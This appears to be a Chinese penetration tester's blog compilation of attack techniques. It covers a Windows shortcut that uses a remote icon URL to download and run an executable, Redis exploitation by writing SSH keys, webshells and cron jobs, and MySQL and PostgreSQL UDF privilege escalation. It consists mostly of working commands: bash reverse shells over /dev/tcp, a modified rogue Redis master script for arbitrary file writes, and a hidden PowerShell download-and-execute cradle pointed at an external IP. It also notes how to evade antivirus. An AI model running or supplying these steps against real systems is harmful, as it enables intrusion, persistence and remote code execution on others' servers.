快捷方式图标下载执行exe

大晚上看到骚操作

看了下文章：

Using Shell Links as zero-touch downloaders and to initiate network connections

原理是利用hex修改快捷方式图标，当计算机获取文件之后会像链接请求并缓存到

C:\Users\f1veT\AppData\Local\Microsoft\Windows\INetCache\IE\下。

在修改链接指向cmd并执行他。

当我还在苦逼的修改hex时候，发现别人直接用ps1生成快捷方式。。。。。。。。mmp

$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("C:\users\f1veT\desktop\aaaa.lnk")
$shortcut.TargetPath = "C:\windows\system32\cmd.exe"
$shortcut.Arguments = ' /c "cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B calc*.exe | cmd.exe /k" '
$shortcut.IconLocation = "http://192.168.2.169:8000/calc.exe?.ico"
$shortcut.Save()

生成运行后会弹出calc文件。

在IE文件夹下会存在calc缓存，但是命名是calc[1].exe，所以使用dir /s /B来获取路径。

自己生成的和文章中的demo对比

aaa.lnk

Demo.lnk

可以看到运行成功。可以配合wmi绕过360等执行命令。

redis路径爆破脚本

• redis路径爆破脚本
  • windows
  • LInux
  • 下载地址

这次项目遇到了一个windows下的redis，想要查找一些web路径，常规文件路径。根据上次总结的脚本利用send_all发送config set dir xxx来判断是否存在目录。

使用如下：

python3 dir.py -r 172.16.142.137 -p 6379 -L 172.16.142.1 -P 11111

a.txt是探测目录字典，我这里放了几个常用目录和sqlmap中的路径。

包含了win和linux

测试结果会在同目录输出out.txt

建议在使用前，本机先连上目标redis 利用CONFIG GEt *查看下其默认配置路径

爆破路径之后记得给恢复。

windows

LInux

下载地址

http://myblogimages.oss-cn-beijing.aliyuncs.com/redis-dir.zip

redis利用整理

• redis利用整理
  • Ubuntu
    • 1、写入SSH公钥
    • 2、redis写入getshell
  • CentOS
    • 写入cron
  • redis主从复制rce
    • 无损写入文件
      • ubuntu无损写入(win下同理随意写入)

Ubuntu

Ubuntu由于和CentOS的sh对应的软连接对象不同(Ubuntu sh软连接指向的dash，所以用bash反弹是报错的，CentOS中sh指向的是bash，所以可以成功)
用`dpkg-reconfigure去remove掉dash也可以修改sh的指向，但是在ubuntu中含有脏数据的cron是无法执行的，只能利用其他方法进行利用。

#ubuntu使用bash反弹shell需要修改sh的软连接对象
#方法1
echo no |  /usr/sbin/dpkg-reconfigure dash
bash -i >& /dev/tcp/127.0.0.1/7777 0>&1
#方法2
bash -c "bash -i  >&/dev/tcp/127.0.0.1/7777 0>&1"
#方法3
ln -s -f bash /bin/sh

1、写入SSH公钥

redis-cli -h 127.0.0.1 config set dir /root/.ssh

redis-cli -h 127.0.0.1 config set dbfilename authorized_keys

echo "ssh-rsa AAAAB3Nxxxxxxxx9N9DI8FFs= xxxxxxxP.lan" > /tmp/attack

vim /tmp/attack #这个文件内容上下必须各有两个回车

cat /tmp/attack | redis-cli -h 127.0.0.1 -x set attack

redis-cli -h 127.0.0.1 save

2、redis写入getshell

​

redis-cli -h 127.0.0.1 config set dir /www/wwwroot/default

redis-cli -h 127.0.0.1 config set dbfilename test.php

echo "<?php phpinfo();?>" > /tmp/php

vim /tmp/php #这个文件内容上下必须各有两个回车

cat /tmp/php | redis-cli -h 127.0.0.1 -x set php

redis-cli -h 127.0.0.1 save

CentOS

写入cron

CentOS的写入公钥和写shell过程和Ubuntu相同，这里就不再继续写了，这里就写以下cron利用写入

CentOS的cron路径有

/var/spool/cron/crontabs
/etc/cron.daily
/etc/cron.deny
/etc/cron.weekly
/etc/cron.monthly
/etc/cron.d
/etc/cron.hourly

redis-cli -h 127.0.0.1 config set dir /var/spool/cron

redis-cli -h 127.0.0.1 config set dbfilename root

echo "*/1 * * * * bash -i  >&/dev/tcp/127.0.0.1/7777 0>&1" > /tmp/attack

vim /tmp/attack  #这个文件内容上下必须各有两个回车

cat /tmp/attack | redis-cli -h 127.0.0.1 -x set attack

redis-cli -h 127.0.0.1 save

redis主从复制rce

无损写入文件

设置好了redis主从复制

接下来就是编写恶意so文件

https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

这里so我从这个项目编译，他实现了一个命令执行函数。

在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRE SYNC同步文件到从机上。

然后在从机上加载so文件，我们就可以执行拓展的新命令了。

最近看大哥发的一个博文中看到有人修改了原本的那个redis主从复制的脚本，实现了任意路基路径无损写入文件的功能，最开始还比较奇怪，脏数据怎么处理，后来想了下，最初的利用poc就已经是完整地传输的eval.so文件，那就代表其实不只是可以MODULE LOAD来加载函数，其实还可以直接无损写入文件/cron等。这里我演示就是在ubuntu的环境下，稍微修改了下利用so的LOAD脚本，实现了任意文件任意路径写入的功能。

ubuntu无损写入(win下同理随意写入)

看了下脚本，其实主要功能就在自己利用python建立了一个socket服务，然后利用目标的redis和本地伪造的服务建立主从复制，然后利用sync同步文件内容，这里面我需要修改项目是

https://github.com/vulhub/redis-rogue-getshell/blob/master/redis-master.py

 client.send([b'SLAVEOF', lhost, lport])
    client.send([b'CONFIG', b'SET', b'dbfilename', b'exp.so'])
    time.sleep(2)
    server.handle_request()
    time.sleep(2)

    client.send([b'MODULE', b'LOAD', b'./exp.so'])
    client.send([b'SLAVEOF', b'NO', b'ONE'])
    client.send([b'CONFIG', b'SET', b'dbfilename', b'dump.rdb'])
    resp = client.send([b'system.exec', command])
    print(decode_command_line(resp))

    client.send([b'MODULE', b'UNLOAD', b'system'])

修改后

    client.send([b'SLAVEOF', lhost, lport])
    client.send([b'CONFIG', b'SET', b'dbfilename', b'aaaaaaaaaa'])
    client.send([b'CONFIG', b'SET', b'dir', b'/'])
    time.sleep(2)
    server.handle_request()
    time.sleep(2)
    client.send([b'SLAVEOF', b'NO', b'ONE'])
    client.send([b'CONFIG', b'SET', b'dbfilename', b'dump.rdb'])

本地创建一个1.txt

txt内容是,字符多一些，查看是否会被脏数据污染。

testtesttesttesttest“！@#￥%%……&!@#$%^*( )"''"

创建伪造服务，连接对方，并读取本地1.txt内容发送过去。

python3 redis-master.py -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -f 1.txt 

可以看到文件传输是无损的。我把传输内容和命令打印出来了，可以看一下上图。

udf提权整理

• udf提权整理
  • udf是什么
  • Mysql
    • udf.dll
    • 无webshell
    • 有webshell
    • sqlmap
  • Postgre
    • 查看版本
    • 创建so库
    • 分割hex导出udf

udf是什么

UDF是mysql的一个拓展接口，UDF（Userdefined function）可翻译为用户自定义函数，这个是用来拓展Mysql的技术手段。

注：

1. 看一下版本，5.1版本的udf提权需要将dll上传到c:\windows\system32下。
2. 5.1以上需要放到下lib\plugin 。
3. 5.7版本secure_file_priv默认为null，设置了以后只能通过修改my.ini，所以没办法进行INTO DUMPFILE写入文件，也就只能在有webshell的情况下进行提权。

Mysql

udf.dll

dll来源可以选择自己编译和下载网上的，我这里用的是sqlmap中自带的dll

其路径是：sqlmap/data/udf/mysql/windows/

但是他的dll是经过异或操作了的，需要在用他自带的脚本在异或一下还原。

脚本路径：sqlmap/extra/cloak

无webshell

在没有webshell的情况下可以利用以下命令查看相关信息：

SELECT @@basedir; --查看安装路径
SHOW VARIABLES LIKE '%plugins%';  --查找是否有plugins目录
show variables like '%compile%'; --查看数据库位数
show variables like "%secure%"; --查看是否由导出位置限制

在只有数据库账号的情况下有个问题就是如果对方服务器mysql版本不是完整版的话是没有lib\plugin文件夹的，google了下资料找到了可以利用NTDS ADS来创建文件夹

select 'udfdll' into dumpfile 'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib::$INDEX_ALLOCATION';
select 'udfdll' into dumpfile 'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\\plugin::$INDEX_ALLOCATION';

因为是没有webshell的情况下，需要利用INTO DUMPFILE导出dll文件，以16进制存入表中在导出成dll

获取16进制命令是

cat lib_mysqludf_sys.dll | xxd -p | tr -d '\n'

drop table udf_temp;
CREATE TABLE udf_temp (udf BLOB);
INSERT into udf_temp values (CONVERT(0x111111111,CHAR));
SELECT udf FROM udf_temp INTO DUMPFILE 'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\\plugin\\udf.dll';
Create Function sys_exec returns string soname 'udf.dll';
Create Function sys_eval returns string soname 'udf.dll';

sqlmap的导出函数是sys_eval和/sys_exec

命令执行成功

select sys_eval("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://101.200.51.204:801/a2'))\"");

sqlmap中的dll应该是msf中的，其中有个比较实用的函数是sys_bineval，这个函数是用来执行shellcode的。

但是只能在32位系统中运行，否则的话会引起mysql进程崩溃。

有webshell

有webshell就比较方便了，直接往li/plugin中上传dll后新建就可以了。

sqlmap

python3 sqlmap.py -d "mysql://root:123456@172.16.142.139:3306/mysql" --os-shell -v 3

可以看到连接上后也是通过insert传入16进制后储存到plugin路径下。

Postgre

查看版本

Postgre也存在udf功能，同理也可以进行写入so文件创建加载函数。

select version(); ##查看版本，在去sqlmap下找

创建so库

创建.so,执行自己需要用的命令

将so文件转换成16进制。

cat lib_postgresqludf_sys.so | xxd -p | tr -d '\n' > dll.txt

分割hex导出udf

postgre对于8k页大小的数据库来说，字段数据大小超过2k时才会触发压缩策略.

https://github.com/sqlmapproject/sqlmap/issues/1170

split -b 1900 dll.txt aaaa #用split分割到2k以下

一条一条执行下面的语句，不然内容内容会被压缩。

SELECT lo_create(1);
insert into pg_largeobject values (1, 0, decode('7f454c4602', 'hex'));
insert into pg_largeobject values (1, 1, decode('020000000200020', 'hex'));
insert into pg_largeobject values (1, 3, decode('00', 'hex'));
insert into pg_largeobject values (1, 4, decode('181e2000', 'hex'));
insert into pg_largeobject values (1, 5, decode('d020000', 'hex'));

SELECT lo_export(1, '/tmp/1.so');

创建函数:

CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/1.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

执行函数：

select sys_eval('id');

删除函数:

DROP FUNCTION sys_eval(text);
DROP FUNCTION sys_exec(text);